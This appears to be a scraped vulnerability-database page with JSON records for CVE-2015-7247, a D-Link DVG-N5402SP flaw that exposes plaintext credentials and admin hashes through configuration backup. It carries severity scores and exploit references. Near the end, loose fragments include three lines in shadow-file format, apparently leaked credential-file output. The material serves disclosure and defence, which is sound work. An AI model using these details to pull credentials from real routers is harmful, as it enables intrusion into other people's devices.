      "source": "cret@cert.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://seclists.org/fulldisclosure/2016/Feb/24"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/39409/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://seclists.org/fulldisclosure/2016/Feb/24"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/39409/"
    }
  ],
  "sourceIdentifier": "cret@cert.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GSD-2015-7247

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

Aliases

CVE-2015-7247

Aliases

CVE-2015-7247

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2015-7247",
    "description": "D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information.",
    "id": "GSD-2015-7247",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2015-7247"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2015-7247"
      ],
      "details": "D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information.",
      "id": "GSD-2015-7247",
      "modified": "2023-12-13T01:20:01.297262Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cert@cert.org",
        "ID": "CVE-2015-7247",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html"
          },
          {
            "name": "20160203 DLink DVG-N5402SP Multiple Vulnerabilities",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2016/Feb/24"
          },
          {
            "name": "39409",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/39409/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-03:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w2000en-00:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dvg-n5402sp:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cert@cert.org",
          "ID": "CVE-2015-7247"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-200"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "39409",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/39409/"
            },
            {
              "name": "20160203 DLink DVG-N5402SP Multiple Vulnerabilities",
              "refsource": "FULLDISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://seclists.org/fulldisclosure/2016/Feb/24"
            },
            {
              "name": "http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-04-26T18:55Z",
      "publishedDate": "2017-04-24T18:59Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2015-7247 (GCVE-0-2015-7247)

CNVD-2016-01162

VAR-201704-0220

root::13796:0:99999:7:::

tw::13796:0:99999:7:::

tw::13796:0:99999:7:::

GHSA-P72R-G2H2-XJJ2

FKIE_CVE-2015-7247

GSD-2015-7247

Tags

Sightings

Nomenclature